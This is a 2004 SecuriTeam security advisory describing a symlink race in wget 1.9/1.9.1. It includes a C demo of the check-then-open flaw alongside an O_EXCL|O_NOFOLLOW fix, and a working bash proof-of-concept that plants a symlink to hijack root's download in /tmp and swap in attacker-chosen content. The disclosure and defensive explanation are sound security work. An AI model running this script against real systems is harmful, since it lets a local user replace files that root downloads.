[UNIX] Wget Race Condition Vulnerability Allows a Symlink Attack
From: SecuriTeam (support_at_securiteam.com)
Date: 05/18/04
To: list@securiteam.com Date: 18 May 2004 19:05:50 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Wget Race Condition Vulnerability Allows a Symlink Attack
------------------------------------------------------------------------
SUMMARY
" <http://www.gnu.org/directory/wget.html> Wget is a network utility to
retrieve files from the Web using http and ftp, the two most widely used
Internet protocols. It works non-interactively, so it will work in the
background, after having logged off. The program supports recursive
retrieval of web-authoring pages as well as ftp sites; you can use wget
to make mirrors of archives and home pages or to travel the Web like a
WWW robot."
A symbolic link attack is possible against wget while it saves a
retrieved file: a local attacker can divert the download so that it is
written to a completely different location than intended, with the
privileges of the user running wget.
DETAILS
Vulnerable Systems:
* Wget versions 1.9, 1.9.1, possibly prior
Before writing a downloaded file, wget checks whether a file with the
target name (the name derived from the URL given on the command line)
already exists. If it does, wget saves the download under a different
name (file.1, file.2 and so on). The problem is that the existence check
and the later open-for-write are two separate operations with nothing
holding the name in between: the file is neither created atomically at
check time nor opened in a way that refuses symbolic links. In the window
between the check and the write, a local attacker can create a symbolic
link under the expected name; wget follows it and the output is diverted
to whatever file the link points to. The attacker needs write access to
the download directory, so the attack applies to world-writable
directories such as /tmp, and when wget is run there by root the diverted
write happens with root privileges.
An example of an attack sequence:
* Wget process starts
* Wget checks whether the target file exists (but does not create or lock it!)
* Attacker creates a symlink under the target name
* Wget opens the name for writing, follows the link and writes to the wrong place
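Worked example, added here and not part of the advisory or of wget's own
source: a small C program that reproduces the check-then-open race the
sequence above describes, with the hardened open next to it. The vulnerable
function separates access() from fopen() and takes a callback that stands
in for the attacker's shell winning the race; the hardened function does
the check and the create in one open() with O_CREAT|O_EXCL|O_NOFOLLOW and
keeps wget's "save under another name" behaviour by retrying with a numeric
suffix. The function names, the race_hook callback, the scratch directory
under /tmp and the "original"/"payload" strings are all this example's own
constructed inputs.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Callback standing in for the attacker's shell winning the race. */
typedef void (*race_hook)(void *arg);

/* VULNERABLE pattern, modelled on the advisory's description of wget:
 * the existence check and the open are separate system calls, and
 * fopen() follows whatever symlink appears at `path` in between. */
int save_check_then_open(const char *path, const char *data, size_t len,
                         race_hook attacker, void *arg)
{
    if (access(path, F_OK) == 0)
        return -1;                /* real wget would try path.1 here */
    if (attacker)
        attacker(arg);            /* race window: `ln -s /dev/null path` */
    FILE *f = fopen(path, "wb");  /* follows the planted symlink */
    if (!f)
        return -1;
    fwrite(data, 1, len, f);
    fclose(f);
    return 0;
}

/* HARDENED pattern: check and create in one atomic open(). O_EXCL makes
 * the kernel fail with EEXIST if anything already sits at the name, a
 * dangling symlink included, and O_NOFOLLOW refuses to traverse a symlink
 * in the final component. The "save under another name" behaviour is kept
 * by retrying with a numeric suffix (path.1, path.2, ...); the name that
 * was actually created is returned in `chosen`. */
int open_unique_nofollow(const char *path, char *chosen, size_t chosen_len)
{
    snprintf(chosen, chosen_len, "%s", path);
    for (int n = 1; n < 1000; n++) {
        int fd = open(chosen, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
        if (fd >= 0)
            return fd;
        if (errno != EEXIST)
            return -1;
        snprintf(chosen, chosen_len, "%s.%d", path, n);
    }
    return -1;
}

/* Attacker's move: symlink arg[1] -> arg[0]. */
static void plant_symlink(void *arg)
{
    const char **p = arg;
    symlink(p[0], p[1]);
}

static int write_str(const char *path, const char *s)
{
    FILE *f = fopen(path, "wb");
    if (!f) return -1;
    fputs(s, f);
    return fclose(f);
}

static int read_str(const char *path, char *buf, size_t n)
{
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    buf[fread(buf, 1, n - 1, f)] = '\0';
    return fclose(f);
}

/* Runs both patterns in a private scratch directory (constructed input,
 * removed afterwards). Returns 0 when the vulnerable open clobbered
 * `victim` and the hardened one left it alone; non-zero names the step. */
int run_demo(void)
{
    char dir[] = "/tmp/wgetrace.XXXXXX", victim[300], out[300], chosen[310], buf[32];
    if (!mkdtemp(dir)) return 1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(out, sizeof out, "%s/patch-2.4.26.bz2", dir);
    const char *args[2] = { victim, out };
    int rc = 0, fd;

    /* 1. vulnerable: attacker wins the race, the download lands in victim */
    write_str(victim, "original");
    if (save_check_then_open(out, "payload", 7, plant_symlink, args) != 0) rc = 2;
    else if (read_str(victim, buf, sizeof buf) || strcmp(buf, "payload")) rc = 3;

    /* 2. hardened: symlink already planted, yet victim is untouched and the
     *    data goes to a freshly created patch-2.4.26.bz2.1 */
    unlink(out);
    write_str(victim, "original");
    plant_symlink(args);
    if ((fd = open_unique_nofollow(out, chosen, sizeof chosen)) < 0) { if (!rc) rc = 4; }
    else {
        if (write(fd, "payload", 7) != 7 && !rc) rc = 5;
        close(fd);
        if ((read_str(victim, buf, sizeof buf) || strcmp(buf, "original")) && !rc) rc = 6;
        if (strcmp(chosen + strlen(out), ".1") != 0 && !rc) rc = 7;
        unlink(chosen);
    }
    unlink(out); unlink(victim); rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = run_demo();
    puts(rc == 0 ? "race reproduced; O_EXCL|O_NOFOLLOW open diverted nothing" : "unexpected result");
    return rc;
}
```

Build with cc -Wall and run as any user; it exits 0 when the vulnerable
path wrote through the symlink and the hardened path did not. The demo
uses a private mkdtemp() directory on purpose: on Linux 3.6 and later the
fs.protected_symlinks sysctl already refuses to follow a symlink in a
sticky world-writable directory such as /tmp when the link's owner differs
from the process following it, so the /tmp scenario from the advisory may
not reproduce on a current kernel even though the check-then-open pattern
itself is still wrong and O_EXCL|O_NOFOLLOW remains the proper fix.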
Exploit:
A proof-of-concept script, wget_race.sh (below), is provided and can be
used in the following manner:
* Open a shell as an unprivileged user A, change to a directory user A
can write to (the script keeps its scratch files there) and run
wget_race.sh
* Open another shell, and as root launch wget from /tmp:
wget http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.26.bz2
* Check the content of /tmp/patch-2.4.26.bz2: instead of the kernel patch
it holds the "Surprise!" line written by the script
#!/bin/bash
# wget_race.sh: run as an unprivileged user while root downloads
# http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.26.bz2 from /tmp.
# salida.txt, pid.txt and *.wget are scratch files in the current directory.
rm -f salida.txt pid.txt *.wget /tmp/patch-2.4.26.bz2
echo "1">salida.txt
a=`cat salida.txt`
echo "Waiting for Wget execution..."
# Busy-wait until a wget fetching the patch shows up in ps; as soon as a
# matching line is appended, $a is no longer just "1".
while [ "$a" == 1 ]
do
    ps auxw|grep wget|grep patch-2.4.26.bz2>>salida.txt
    a=`cat salida.txt`
done
echo "Process caught!"
pgrep -u root wget>pid.txt
# Win the race: wget has already checked that the file does not exist but
# has not opened it yet, so plant a symlink under the expected name.
ln -s /dev/null /tmp/patch-2.4.26.bz2
echo "/dev/null link created!"
echo "Waiting for downloading to finish..."
# Poll root's wget PID. Once wget exits, pgrep prints nothing, the marker
# file becomes plain ".wget" and the loop below notices it.
b=`pgrep -u root wget`
touch $b.wget
c=1
while [ "$c" == 1 ]
do
    if [ -e .wget ]
    then
        c=0
        echo "Downloading finished! Let's delete the original file, and put our trojaned file :-)"
        # The real download went into /dev/null; replace the symlink with
        # content of our choosing.
        rm -f /tmp/patch-2.4.26.bz2
        echo "Surprise!">/tmp/patch-2.4.26.bz2
        echo "Did it work?"
        ls -la /tmp/patch-2.4.26.bz2
    else
        b=`pgrep -u root wget`
        touch $b.wget
    fi
done
ADDITIONAL INFORMATION
The information has been provided by
<mailto:overclocking_a_la_abuela@hotmail.com> Hugo Vázquez Caramés.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.